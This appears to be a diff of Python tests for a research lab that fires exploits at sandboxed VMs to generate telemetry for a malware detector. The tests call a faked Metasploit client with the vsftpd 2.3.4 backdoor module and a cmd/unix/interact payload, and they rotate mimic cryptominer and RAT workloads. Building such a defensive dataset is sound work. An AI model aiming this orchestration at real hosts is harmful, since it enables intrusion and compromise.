client._sessions = {99: {"type": "shell"}} # pre-existing session
|
||||
driver.setup()
|
||||
assert client.logged_in is True
|
||||
assert driver._sessions_seen_at_arm == {99}
|
||||
assert events[0][0] == "driver_setup"
|
||||
assert events[0][1]["module"] == "unix/ftp/vsftpd_234_backdoor"
|
||||
assert events[0][1]["target_ip"] == "10.200.0.10"
|
||||
|
||||
|
||||
def test_full_phase_walk_emits_expected_event_order() -> None:
|
||||
driver, client, events = _make_driver(
|
||||
sessions_after_fire={1: {"type": "shell", "tunnel_peer": "10.200.0.10:21"}},
|
||||
)
|
||||
driver.setup()
|
||||
for phase in [
|
||||
"clean", "armed", "infecting",
|
||||
"infected_running", "dormant",
|
||||
"infected_running", "dormant",
|
||||
"clean",
|
||||
]:
|
||||
driver.set_phase(phase)
|
||||
driver.teardown()
|
||||
|
||||
names = [e[0] for e in events]
|
||||
# Order matters: fire comes before session_open, which comes before
|
||||
# workload, which comes before kill+logout.
|
||||
assert names.index("exploit_fire") < names.index("session_open")
|
||||
assert names.index("session_open") < names.index("session_landing_probe")
|
||||
assert names.index("session_landing_probe") < names.index("sample_executed")
|
||||
assert names.count("sample_executed") == 2 # two infected_running phases
|
||||
assert names.count("session_dormant") == 2
|
||||
assert "session_killed" in names
|
||||
|
||||
# Driver should have asked the FakeClient to fire exactly once.
|
||||
fire_calls = [c for c in client.calls if c[0] == "module_execute"]
|
||||
assert len(fire_calls) == 1
|
||||
_, args, _ = fire_calls[0]
|
||||
assert args[1] == "unix/ftp/vsftpd_234_backdoor"
|
||||
assert args[2]["RHOSTS"] == "10.200.0.10"
|
||||
assert args[2]["PAYLOAD"] == "cmd/unix/interact"
|
||||
|
||||
|
||||
def test_session_open_timeout_emits_timeout_event() -> None:
|
||||
# No sessions ever appear after fire.
|
||||
driver, client, events = _make_driver(sessions_after_fire={})
|
||||
driver.setup()
|
||||
driver.set_phase("armed")
|
||||
driver.set_phase("infecting")
|
||||
names = [e[0] for e in events]
|
||||
assert "session_open_timeout" in names
|
||||
assert "session_open" not in names
|
||||
|
||||
|
||||
def test_workload_phases_are_no_op_without_session() -> None:
|
||||
driver, client, events = _make_driver(sessions_after_fire={})
|
||||
driver.setup()
|
||||
driver.set_phase("armed")
|
||||
driver.set_phase("infecting") # times out, no session
|
||||
driver.set_phase("infected_running")
|
||||
driver.set_phase("dormant")
|
||||
# No shell writes should have happened.
|
||||
assert client.shell_writes == []
|
||||
|
||||
|
||||
def test_arm_is_idempotent() -> None:
|
||||
driver, client, events = _make_driver(
|
||||
sessions_after_fire={1: {"type": "shell"}},
|
||||
)
|
||||
driver.setup()
|
||||
driver.set_phase("armed")
|
||||
driver.set_phase("armed")
|
||||
fire_calls = [c for c in client.calls if c[0] == "module_execute"]
|
||||
assert len(fire_calls) == 1
|
||||
|
||||
|
||||
def test_teardown_kills_session_and_logs_out() -> None:
|
||||
driver, client, events = _make_driver(
|
||||
sessions_after_fire={1: {"type": "shell"}},
|
||||
)
|
||||
driver.setup()
|
||||
driver.set_phase("armed")
|
||||
driver.set_phase("infecting")
|
||||
driver.teardown()
|
||||
assert any(c[0] == "session_stop" for c in client.calls)
|
||||
assert client.logged_in is False
|
||||
assert any(e[0] == "session_killed" for e in events)
|
||||
|
||||
|
||||
# -----------------------------------------------------------------------
|
||||
# Driver wired into a real EpisodeRunner — events land in events.jsonl
|
||||
# -----------------------------------------------------------------------
|
||||
|
||||
# -----------------------------------------------------------------------
|
||||
# Driver v2 — sample-profile-driven workloads
|
||||
# -----------------------------------------------------------------------
|
||||
|
||||
def test_v2_uses_profile_workload_for_cpu_saturate() -> None:
|
||||
"""When constructed with a Sample, the driver should send the
|
||||
profile's start_cmd at infected_running rather than the v1
|
||||
yes-loop. The actual command body is owned by exploits.workloads
|
||||
and tested there; here we just confirm dispatch."""
|
||||
from samples.manifest import Sample as _Sample
|
||||
|
||||
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
|
||||
client = FakeMSFRpcClient(
|
||||
sessions_after_fire={1: {"type": "shell", "tunnel_peer": "x:21"}},
|
||||
)
|
||||
events: list[tuple[str, dict]] = []
|
||||
sample = _Sample(
|
||||
name="xmrig-cryptominer",
|
||||
family="XMRig",
|
||||
category="cryptominer",
|
||||
profile="cpu-saturate",
|
||||
)
|
||||
|
||||
driver = MSFExploitDriver(
|
||||
client=client, # type: ignore[arg-type]
|
||||
module=cfg,
|
||||
cfg=DriverConfig(target_ip="10.200.0.10", session_open_timeout_s=0.5),
|
||||
emit_event=lambda ev, **kw: events.append((ev, kw)),
|
||||
sample=sample,
|
||||
)
|
||||
driver.setup()
|
||||
driver.set_phase("armed")
|
||||
driver.set_phase("infecting")
|
||||
driver.set_phase("infected_running")
|
||||
driver.set_phase("dormant")
|
||||
driver.teardown()
|
||||
|
||||
# The shell command sent at infected_running should be the
|
||||
# profile's multi-line wrapper — NOT the v1 single-yes line.
|
||||
starts = [w for (_, w) in client.shell_writes if "yes > /dev/null" in w and "cis490-workload" not in w]
|
||||
assert starts == [], "v2 driver must not send the v1 yes-loop when a Sample is supplied"
|
||||
|
||||
# The driver_setup event records sample + workload metadata.
|
||||
setup_events = [kw for (e, kw) in events if e == "driver_setup"]
|
||||
assert setup_events
|
||||
assert setup_events[0]["sample"] == "xmrig-cryptominer"
|
||||
assert setup_events[0]["sample_kind"] == "mimic"
|
||||
assert setup_events[0]["workload_profile"] == "cpu-saturate"
|
||||
|
||||
# sample_executed carries the profile name + description.
|
||||
se = [kw for (e, kw) in events if e == "sample_executed"]
|
||||
assert se
|
||||
assert se[0]["profile"] == "cpu-saturate"
|
||||
assert se[0]["sample"] == "xmrig-cryptominer"
|
||||
|
||||
|
||||
def test_v2_distinct_workloads_per_profile() -> None:
|
||||
"""Two different profiles must produce *different* shell commands.
|
||||
This is the property that gives the ML model varied envelopes to
|
||||
learn from."""
|
||||
from exploits.workloads import all_profiles, workload_for
|
||||
from samples.manifest import Sample as _Sample
|
||||
|
||||
profiles = all_profiles()
|
||||
assert len(profiles) >= 4
|
||||
seen_starts: set[str] = set()
|
||||
for p in profiles:
|
||||
s = _Sample(name=f"x-{p}", family="X", category="rat", profile=p)
|
||||
w = workload_for(s)
|
||||
assert w is not None
|
||||
seen_starts.add(w.start_cmd)
|
||||
# Every profile must have a distinct start_cmd.
|
||||
assert len(seen_starts) == len(profiles), \
|
||||
"two profiles produced the same workload — ML diversity is at risk"
|
||||
|
||||
|
||||
def test_v2_unknown_profile_falls_back_to_cpu_saturate() -> None:
|
||||
from exploits.workloads import workload_for
|
||||
from samples.manifest import Sample as _Sample
|
||||
|
||||
s = _Sample(name="weird", family="X", category="rat", profile="not-a-real-profile")
|
||||
w = workload_for(s)
|
||||
assert w is not None
|
||||
assert w.profile == "cpu-saturate"
|
||||
|
||||
|
||||
def test_v1_path_still_works_when_no_sample() -> None:
|
||||
"""Ensure backwards compat: a driver constructed without a sample
|
||||
uses the original yes-loop workload."""
|
||||
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
|
||||
client = FakeMSFRpcClient(sessions_after_fire={1: {"type": "shell"}})
|
||||
driver = MSFExploitDriver(
|
||||
client=client, # type: ignore[arg-type]
|
||||
module=cfg,
|
||||
cfg=DriverConfig(target_ip="10.200.0.10", session_open_timeout_s=0.5),
|
||||
emit_event=lambda *a, **kw: None,
|
||||
)
|
||||
driver.setup()
|
||||
driver.set_phase("armed")
|
||||
driver.set_phase("infecting")
|
||||
driver.set_phase("infected_running")
|
||||
driver.teardown()
|
||||
assert any("yes > /dev/null" in w for (_, w) in client.shell_writes)
|
||||
|
||||
|
||||
def test_driver_events_persist_to_events_jsonl(tmp_path: Path) -> None:
|
||||
"""When the driver is connected to a real EpisodeRunner, the
|
||||
events it emits must show up in the episode's events.jsonl with
|
||||
monotonic-clock timestamps (so labels and exploit events can be
|
||||
correlated downstream)."""
|
||||
import os
|
||||
|
||||
from orchestrator.episode import EpisodeConfig, EpisodeRunner
|
||||
|
||||
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
|
||||
client = FakeMSFRpcClient(
|
||||
sessions_after_fire={1: {"type": "shell", "tunnel_peer": "x:21"}},
|
||||
)
|
||||
|
||||
schedule = [
|
||||
("clean", 0.05),
|
||||
("armed", 0.05),
|
||||
("infecting", 0.05),
|
||||
("infected_running", 0.05),
|
||||
("dormant", 0.05),
|
||||
("clean", 0.05),
|
||||
]
|
||||
ec = EpisodeConfig(
|
||||
target_pid=os.getpid(),
|
||||
duration_s=sum(d for _, d in schedule),
|
||||
interval_ms=20,
|
||||
data_root=tmp_path,
|
||||
phase_schedule=schedule,
|
||||
)
|
||||
runner = EpisodeRunner(ec)
|
||||
driver = MSFExploitDriver(
|
||||
client=client, # type: ignore[arg-type]
|
||||
module=cfg,
|
||||
cfg=DriverConfig(target_ip="10.200.0.10", session_open_timeout_s=0.5),
|
||||
emit_event=runner.emit_event,
|
||||
)
|
||||
runner.on_phase = driver.set_phase
|
||||
driver.setup()
|
||||
try:
|
||||
result = runner.run()
|
||||
finally:
|
||||
driver.teardown()
|
||||
|
||||
events = [
|
||||
json.loads(l)
|
||||
for l in (result.episode_dir / "events.jsonl").read_text().splitlines()
|
||||
]
|
||||
names = [e["event"] for e in events]
|
||||
assert "snapshot_load" in names
|
||||
assert "driver_setup" in names
|
||||
assert "exploit_fire" in names
|
||||
assert "session_open" in names
|
||||
assert "sample_executed" in names
|
||||
assert "session_dormant" in names
|
||||
assert "episode_end" in names
|
||||
|
||||
# Driver events must carry monotonic timestamps in episode-relative
|
||||
# order (snapshot_load is essentially at origin, exploit_fire later,
|
||||
# session_open later still, episode_end last).
|
||||
by_name = {e["event"]: e for e in events}
|
||||
assert by_name["snapshot_load"]["t_mono_ns"] < 1_000_000 # <1ms after origin
|
||||
assert by_name["exploit_fire"]["t_mono_ns"] > by_name["snapshot_load"]["t_mono_ns"]
|
||||
assert by_name["session_open"]["t_mono_ns"] >= by_name["exploit_fire"]["t_mono_ns"]
|
||||
assert by_name["episode_end"]["t_mono_ns"] >= by_name["session_open"]["t_mono_ns"]
|
||||
392
tests/test_fleet.py
Normal file
392
tests/test_fleet.py
Normal file
|
|
@ -0,0 +1,392 @@
|
|||
"""Tests for fleet capacity calculation + sample manifest selection.
|
||||
|
||||
Capacity is unit-tested via deterministic monkeypatching of /proc and
|
||||
os.cpu_count so the math is exercised independently of the host
|
||||
running the suite. Sample selection has its own tests covering the
|
||||
"different hosts pick different samples" property.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
from pathlib import Path
|
||||
|
||||
import pytest
|
||||
|
||||
from orchestrator import fleet
|
||||
from samples.manifest import Sample, SampleManifest
|
||||
|
||||
|
||||
REPO_ROOT = Path(__file__).resolve().parent.parent
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Capacity
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def _patch_capacity_inputs(
|
||||
monkeypatch,
|
||||
*,
|
||||
cores: int,
|
||||
ram_total_mib: int,
|
||||
ram_available_mib: int,
|
||||
load_1m: float = 0.0,
|
||||
) -> None:
|
||||
monkeypatch.setattr(fleet.os, "cpu_count", lambda: cores)
|
||||
monkeypatch.setattr(
|
||||
fleet, "_read_meminfo",
|
||||
lambda: {
|
||||
"MemTotal": ram_total_mib * 1024 * 1024,
|
||||
"MemAvailable": ram_available_mib * 1024 * 1024,
|
||||
},
|
||||
)
|
||||
monkeypatch.setattr(fleet, "_read_loadavg", lambda: load_1m)
|
||||
|
||||
|
||||
def test_capacity_8core_idle_box(monkeypatch) -> None:
|
||||
_patch_capacity_inputs(monkeypatch, cores=8, ram_total_mib=16384, ram_available_mib=14000)
|
||||
c = fleet.detect_capacity(ram_per_vm_mib=320)
|
||||
assert c.cores_total == 8
|
||||
assert c.cores_reserved == 1 # 8 // 8 = 1
|
||||
assert c.max_by_cores == 7
|
||||
# Plenty of RAM, idle → cores binding.
|
||||
assert c.max_concurrent == 7
|
||||
assert "binding=cores" in c.rationale
|
||||
|
||||
|
||||
def test_capacity_low_ram_caps_below_cores(monkeypatch) -> None:
|
||||
# 8 cores but only ~2 GiB free → ram caps below cores.
|
||||
_patch_capacity_inputs(monkeypatch, cores=8, ram_total_mib=4096, ram_available_mib=2048)
|
||||
c = fleet.detect_capacity(ram_per_vm_mib=320)
|
||||
# headroom = max(1024, 4096//8) = 1024
|
||||
# max_by_ram = (2048 - 1024) // 320 = 3
|
||||
assert c.max_by_ram == 3
|
||||
assert c.max_concurrent == 3
|
||||
|
||||
|
||||
def test_capacity_high_load_halves_concurrency(monkeypatch) -> None:
|
||||
# 8 cores, plenty of RAM, but load_1m / cores > 0.75
|
||||
_patch_capacity_inputs(
|
||||
monkeypatch, cores=8, ram_total_mib=16384, ram_available_mib=14000,
|
||||
load_1m=7.0, # 7/8 = 0.875 > 0.75
|
||||
)
|
||||
c = fleet.detect_capacity(ram_per_vm_mib=320)
|
||||
# max_by_cores = 7; max_by_load = max(1, 7//2) = 3
|
||||
assert c.max_by_load == 3
|
||||
assert c.max_concurrent == 3
|
||||
|
||||
|
||||
def test_capacity_pi5_class(monkeypatch) -> None:
|
||||
"""4 cores + 8 GiB → reserve 1 core, run 3 concurrent."""
|
||||
_patch_capacity_inputs(monkeypatch, cores=4, ram_total_mib=7951, ram_available_mib=5223)
|
||||
c = fleet.detect_capacity(ram_per_vm_mib=320)
|
||||
assert c.cores_total == 4
|
||||
assert c.max_concurrent == 3
|
||||
|
||||
|
||||
def test_capacity_minimal_box(monkeypatch) -> None:
|
||||
"""1-core 1 GiB host shouldn't try to run any VMs."""
|
||||
_patch_capacity_inputs(monkeypatch, cores=1, ram_total_mib=1024, ram_available_mib=512)
|
||||
c = fleet.detect_capacity(ram_per_vm_mib=320)
|
||||
assert c.max_concurrent == 0
|
||||
|
||||
|
||||
def test_capacity_to_dict_round_trips(monkeypatch) -> None:
|
||||
_patch_capacity_inputs(monkeypatch, cores=4, ram_total_mib=8000, ram_available_mib=6000)
|
||||
c = fleet.detect_capacity(ram_per_vm_mib=320)
|
||||
d = c.to_dict()
|
||||
assert d["cores_total"] == 4
|
||||
assert d["max_concurrent"] == c.max_concurrent
|
||||
assert "rationale" in d
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Sample manifest
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def test_repo_manifest_loads() -> None:
|
||||
m = SampleManifest.load(REPO_ROOT / "samples" / "manifest.toml")
|
||||
assert len(m) >= 4
|
||||
# Every entry has required fields.
|
||||
for s in m.samples:
|
||||
assert s.name and s.family and s.category and s.profile
|
||||
# All "mimic" today; will switch as real samples are added.
|
||||
assert all(s.kind == "mimic" for s in m.samples)
|
||||
|
||||
|
||||
def test_selection_is_deterministic() -> None:
|
||||
m = SampleManifest.load(REPO_ROOT / "samples" / "manifest.toml")
|
||||
a = m.select(host_id="lab-1", slot=2, episode_index=5)
|
||||
b = m.select(host_id="lab-1", slot=2, episode_index=5)
|
||||
assert a is b
|
||||
|
||||
|
||||
def test_selection_differs_across_hosts() -> None:
|
||||
"""Two hosts on the same slot/episode should generally hit
|
||||
different samples (probabilistic — assert distribution, not
|
||||
individual equality).
|
||||
"""
|
||||
m = SampleManifest.load(REPO_ROOT / "samples" / "manifest.toml")
|
||||
if len(m) < 2:
|
||||
pytest.skip("manifest too small for diversity check")
|
||||
matches = 0
|
||||
for slot in range(20):
|
||||
a = m.select(host_id="alice", slot=slot, episode_index=0)
|
||||
b = m.select(host_id="bob", slot=slot, episode_index=0)
|
||||
if a is b:
|
||||
matches += 1
|
||||
# If the catalog has N samples, naive collision rate ~1/N. With
|
||||
# 20 trials and N≥4 we expect ~5 matches; allow up to half.
|
||||
assert matches < 15, "host_id seed isn't producing variety"
|
||||
|
||||
|
||||
def test_selection_walks_catalog_across_episodes() -> None:
|
||||
"""A single host over many episodes should hit every sample at
|
||||
least once."""
|
||||
m = SampleManifest.load(REPO_ROOT / "samples" / "manifest.toml")
|
||||
seen = set()
|
||||
for ep in range(200):
|
||||
seen.add(m.select(host_id="lab-x", slot=0, episode_index=ep).name)
|
||||
assert len(seen) == len(m), f"only saw {len(seen)}/{len(m)} samples"
|
||||
|
||||
|
||||
def test_manifest_rejects_missing_required_field(tmp_path: Path) -> None:
|
||||
p = tmp_path / "bad.toml"
|
||||
p.write_text(
|
||||
'[[sample]]\n'
|
||||
'name = "x"\n'
|
||||
'family = "y"\n'
|
||||
'# missing category\n'
|
||||
'profile = "z"\n'
|
||||
)
|
||||
with pytest.raises(ValueError, match="category"):
|
||||
SampleManifest.load(p)
|
||||
|
||||
|
||||
def test_manifest_rejects_unknown_category(tmp_path: Path) -> None:
|
||||
p = tmp_path / "bad.toml"
|
||||
p.write_text(
|
||||
'[[sample]]\n'
|
||||
'name = "x"\n'
|
||||
'family = "y"\n'
|
||||
'category = "fish"\n'
|
||||
'profile = "z"\n'
|
||||
)
|
||||
with pytest.raises(ValueError, match="category"):
|
||||
SampleManifest.load(p)
|
||||
|
||||
|
||||
def test_manifest_rejects_duplicate_names(tmp_path: Path) -> None:
|
||||
p = tmp_path / "dup.toml"
|
||||
p.write_text(
|
||||
'[[sample]]\n'
|
||||
'name = "x"\nfamily = "y"\ncategory = "rat"\nprofile = "z"\n'
|
||||
'\n[[sample]]\n'
|
||||
'name = "x"\nfamily = "y"\ncategory = "rat"\nprofile = "z"\n'
|
||||
)
|
||||
with pytest.raises(ValueError, match="duplicate"):
|
||||
SampleManifest.load(p)
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Fleet dispatch — Tier 3 vs Tier 2 selection + per-slot module rotation
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
class _RecordingPopen:
|
||||
"""Replacement for subprocess.run that just records what it would
|
||||
have invoked. Returns a returncode-0 result."""
|
||||
calls: list[dict] = []
|
||||
|
||||
def __init__(self, args, **kwargs) -> None:
|
||||
# Mimic CompletedProcess shape.
|
||||
type(self).calls.append({"args": args, "env": kwargs.get("env"), "cwd": kwargs.get("cwd")})
|
||||
self.returncode = 0
|
||||
self.stdout = b""
|
||||
self.stderr = b""
|
||||
|
||||
|
||||
def _fleet_cfg_with_modules(tmp_path: Path, *, force_tier2: bool = False):
|
||||
from exploits.modules import load_module_configs
|
||||
from orchestrator import fleet
|
||||
from samples.manifest import SampleManifest
|
||||
|
||||
repo_root = REPO_ROOT
|
||||
return fleet.FleetConfig(
|
||||
host_id="test-host",
|
||||
repo_root=repo_root,
|
||||
data_root=tmp_path,
|
||||
manifest=SampleManifest.load(repo_root / "samples" / "manifest.toml"),
|
||||
modules=load_module_configs(repo_root / "exploits" / "modules"),
|
||||
force_tier2=force_tier2,
|
||||
)
|
||||
|
||||
|
||||
def _patch_subprocess(monkeypatch):
|
||||
from orchestrator import fleet
|
||||
_RecordingPopen.calls = []
|
||||
monkeypatch.setattr(fleet.subprocess, "run", _RecordingPopen)
|
||||
|
||||
|
||||
def test_fleet_dispatches_to_tier3_when_msfrpcd_listening(monkeypatch, tmp_path) -> None:
|
||||
from orchestrator import fleet
|
||||
cfg = _fleet_cfg_with_modules(tmp_path)
|
||||
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
|
||||
_patch_subprocess(monkeypatch)
|
||||
capacity = fleet.detect_capacity()
|
||||
|
||||
sample = cfg.manifest.samples[0]
|
||||
res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
|
||||
|
||||
assert res.tier == "tier3", res
|
||||
assert res.module_name in cfg.modules
|
||||
cmd = _RecordingPopen.calls[-1]["args"]
|
||||
# The Tier-3 runner is what gets invoked.
|
||||
assert any("run_tier3_demo.py" in str(a) for a in cmd)
|
||||
# The module name is plumbed through.
|
||||
assert "--module" in cmd
|
||||
assert res.module_name in cmd
|
||||
|
||||
|
||||
def test_fleet_falls_back_to_tier2_when_msfrpcd_down(monkeypatch, tmp_path) -> None:
|
||||
from orchestrator import fleet
|
||||
cfg = _fleet_cfg_with_modules(tmp_path)
|
||||
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: False)
|
||||
_patch_subprocess(monkeypatch)
|
||||
capacity = fleet.detect_capacity()
|
||||
|
||||
sample = cfg.manifest.samples[0]
|
||||
res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
|
||||
|
||||
assert res.tier == "tier2"
|
||||
assert res.module_name is None
|
||||
cmd = _RecordingPopen.calls[-1]["args"]
|
||||
assert any("run_real_vm_demo.py" in str(a) for a in cmd)
|
||||
|
||||
|
||||
def test_fleet_falls_back_to_tier2_when_module_catalog_empty(monkeypatch, tmp_path) -> None:
|
||||
from orchestrator import fleet
|
||||
from samples.manifest import SampleManifest
|
||||
cfg = fleet.FleetConfig(
|
||||
host_id="test-host",
|
||||
repo_root=REPO_ROOT,
|
||||
data_root=tmp_path,
|
||||
manifest=SampleManifest.load(REPO_ROOT / "samples" / "manifest.toml"),
|
||||
modules={}, # explicitly empty
|
||||
)
|
||||
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
|
||||
_patch_subprocess(monkeypatch)
|
||||
capacity = fleet.detect_capacity()
|
||||
|
||||
sample = cfg.manifest.samples[0]
|
||||
res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
|
||||
assert res.tier == "tier2"
|
||||
|
||||
|
||||
def test_fleet_force_tier2_overrides_msfrpcd(monkeypatch, tmp_path) -> None:
|
||||
from orchestrator import fleet
|
||||
cfg = _fleet_cfg_with_modules(tmp_path, force_tier2=True)
|
||||
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
|
||||
_patch_subprocess(monkeypatch)
|
||||
capacity = fleet.detect_capacity()
|
||||
|
||||
sample = cfg.manifest.samples[0]
|
||||
res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
|
||||
assert res.tier == "tier2"
|
||||
|
||||
|
||||
def test_fleet_skips_requires_bridge_modules_when_no_bridge(monkeypatch, tmp_path) -> None:
|
||||
"""Fleet must filter out callback-payload modules when BRIDGE is
|
||||
unset — otherwise the exploit fires but the session never lands
|
||||
and the episode degenerates to a 30 s session_open_timeout."""
|
||||
from orchestrator import fleet
|
||||
cfg = _fleet_cfg_with_modules(tmp_path)
|
||||
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
|
||||
monkeypatch.delenv("BRIDGE", raising=False)
|
||||
_patch_subprocess(monkeypatch)
|
||||
capacity = fleet.detect_capacity()
|
||||
|
||||
sample = cfg.manifest.samples[0]
|
||||
seen_modules = set()
|
||||
for ep in range(20):
|
||||
res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=ep, capacity=capacity)
|
||||
if res.tier == "tier3" and res.module_name:
|
||||
seen_modules.add(res.module_name)
|
||||
|
||||
# Every selected module must be callback-free (same-socket).
|
||||
callback_modules = {
|
||||
m.name for m in cfg.modules.values() if m.requires_bridge
|
||||
}
|
||||
assert callback_modules, "test setup error: expected some require_bridge modules"
|
||||
assert not (seen_modules & callback_modules), \
|
||||
f"selected callback modules without BRIDGE: {seen_modules & callback_modules}"
|
||||
|
||||
|
||||
def test_fleet_uses_all_modules_when_bridge_set(monkeypatch, tmp_path) -> None:
|
||||
"""With BRIDGE set, the full catalog (including reverse/bind shell
|
||||
payloads) is in rotation."""
|
||||
from orchestrator import fleet
|
||||
cfg = _fleet_cfg_with_modules(tmp_path)
|
||||
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
|
||||
monkeypatch.setenv("BRIDGE", "br-malware")
|
||||
_patch_subprocess(monkeypatch)
|
||||
capacity = fleet.detect_capacity()
|
||||
|
||||
sample = cfg.manifest.samples[0]
|
||||
seen = set()
|
||||
for ep in range(40):
|
||||
res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=ep, capacity=capacity)
|
||||
if res.tier == "tier3" and res.module_name:
|
||||
seen.add(res.module_name)
|
||||
assert seen == set(cfg.modules.keys()), \
|
||||
f"only saw {seen}/{set(cfg.modules.keys())}"
|
||||
|
||||
|
||||
def test_fleet_propagates_bridge_env_to_runner(monkeypatch, tmp_path) -> None:
|
||||
"""When BRIDGE is set in the parent env, the per-slot subprocess
|
||||
env must carry it through so launch_target.sh enters tap+bridge mode."""
|
||||
from orchestrator import fleet
|
||||
cfg = _fleet_cfg_with_modules(tmp_path)
|
||||
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
|
||||
monkeypatch.setenv("BRIDGE", "br-malware")
|
||||
_patch_subprocess(monkeypatch)
|
||||
capacity = fleet.detect_capacity()
|
||||
sample = cfg.manifest.samples[0]
|
||||
fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
|
||||
assert _RecordingPopen.calls[-1]["env"]["BRIDGE"] == "br-malware"
|
||||
|
||||
|
||||
def test_fleet_assigns_unique_port_base_per_slot(monkeypatch, tmp_path) -> None:
|
||||
"""Concurrent Tier-3 slots can't share the host-side hostfwd port
|
||||
or all targets stomp on each other's vsftpd:21 → 21 mapping. The
|
||||
fleet must shift PORT_BASE per slot."""
|
||||
from orchestrator import fleet
|
||||
cfg = _fleet_cfg_with_modules(tmp_path)
|
||||
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
|
||||
_patch_subprocess(monkeypatch)
|
||||
capacity = fleet.detect_capacity()
|
||||
|
||||
sample = cfg.manifest.samples[0]
|
||||
fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
|
||||
fleet._run_slot(cfg, slot=1, sample=sample, episode_index=0, capacity=capacity)
|
||||
fleet._run_slot(cfg, slot=2, sample=sample, episode_index=0, capacity=capacity)
|
||||
|
||||
port_bases = [c["env"]["PORT_BASE"] for c in _RecordingPopen.calls]
|
||||
assert len(set(port_bases)) == len(port_bases), \
|
||||
f"PORT_BASE collision across slots: {port_bases}"
|
||||
|
||||
|
||||
def test_manifest_marks_real_when_sha256_present(tmp_path: Path) -> None:
|
||||
p = tmp_path / "real.toml"
|
||||
p.write_text(
|
||||
'[[sample]]\n'
|
||||
'name = "real-one"\nfamily = "y"\ncategory = "rat"\nprofile = "z"\n'
|
||||
'sha256 = "abc123"\n'
|
||||
'\n[[sample]]\n'
|
||||
'name = "mimic-one"\nfamily = "y"\ncategory = "rat"\nprofile = "z"\n'
|
||||
)
|
||||
m = SampleManifest.load(p)
|
||||
by_name = {s.name: s for s in m.samples}
|
||||
assert by_name["real-one"].kind == "real"
|
||||
assert by_name["mimic-one"].kind == "mimic"
|
||||
152
tests/test_guest_agent.py
Normal file
152
tests/test_guest_agent.py
Normal file
|
|
@ -0,0 +1,152 @@
|
|||
"""Tests for the host-side guest-agent collector.
|
||||
|
||||
We simulate the in-guest agent by spinning up a unix socket server
|
||||
(stand-in for the QEMU virtio-serial chardev) that writes a few
|
||||
JSON-lines rows. The collector should read them, re-stamp with the
|
||||
host's monotonic clock, and persist to telemetry-guest.jsonl.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import socket
|
||||
import threading
|
||||
import time
|
||||
from pathlib import Path
|
||||
|
||||
import pytest
|
||||
|
||||
from collectors import guest_agent
|
||||
|
||||
|
||||
class FakeAgentServer(threading.Thread):
|
||||
def __init__(self, sock_path: Path, rows: list[dict], delay_s: float = 0.05) -> None:
|
||||
super().__init__(daemon=True)
|
||||
self.sock_path = sock_path
|
||||
self.rows = rows
|
||||
self.delay_s = delay_s
|
||||
self._sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
|
||||
self._sock.bind(str(sock_path))
|
||||
self._sock.listen(1)
|
||||
self._sock.settimeout(5.0)
|
||||
|
||||
def run(self) -> None:
|
||||
try:
|
||||
conn, _ = self._sock.accept()
|
||||
except socket.timeout:
|
||||
return
|
||||
try:
|
||||
for row in self.rows:
|
||||
conn.sendall((json.dumps(row) + "\n").encode())
|
||||
time.sleep(self.delay_s)
|
||||
time.sleep(0.1)
|
||||
finally:
|
||||
conn.close()
|
||||
self._sock.close()
|
||||
|
||||
|
||||
def test_collector_reads_jsonl_and_restamps(tmp_path: Path) -> None:
|
||||
sock_path = tmp_path / "agent.sock"
|
||||
rows_in = [
|
||||
{
|
||||
"t_guest_mono_ns": 1, "t_guest_wall_ns": 2,
|
||||
"source": "guest_agent", "available_in_deployment": True,
|
||||
"mem_total_bytes": 256 * 1024 * 1024,
|
||||
"mem_available_bytes": 200 * 1024 * 1024,
|
||||
"load_1m_5m_15m": [0.1, 0.05, 0.0],
|
||||
"cpu_total_jiffies": {"user": 10, "system": 5, "idle": 1000},
|
||||
},
|
||||
{
|
||||
"t_guest_mono_ns": 100_000_000, "t_guest_wall_ns": 100_000_002,
|
||||
"source": "guest_agent", "available_in_deployment": True,
|
||||
"mem_total_bytes": 256 * 1024 * 1024,
|
||||
"mem_available_bytes": 198 * 1024 * 1024,
|
||||
},
|
||||
]
|
||||
server = FakeAgentServer(sock_path, rows_in, delay_s=0.02)
|
||||
server.start()
|
||||
out_path = tmp_path / "telemetry-guest.jsonl"
|
||||
stop = threading.Event()
|
||||
|
||||
def stop_after(ms: int) -> None:
|
||||
time.sleep(ms / 1000.0)
|
||||
stop.set()
|
||||
|
||||
threading.Thread(target=stop_after, args=(300,), daemon=True).start()
|
||||
|
||||
rows_written = guest_agent.run_loop(
|
||||
socket_path=sock_path,
|
||||
output_path=out_path,
|
||||
t_mono_origin_ns=time.monotonic_ns(),
|
||||
stop_event=stop,
|
||||
connect_timeout_s=2.0,
|
||||
)
|
||||
server.join(timeout=2)
|
||||
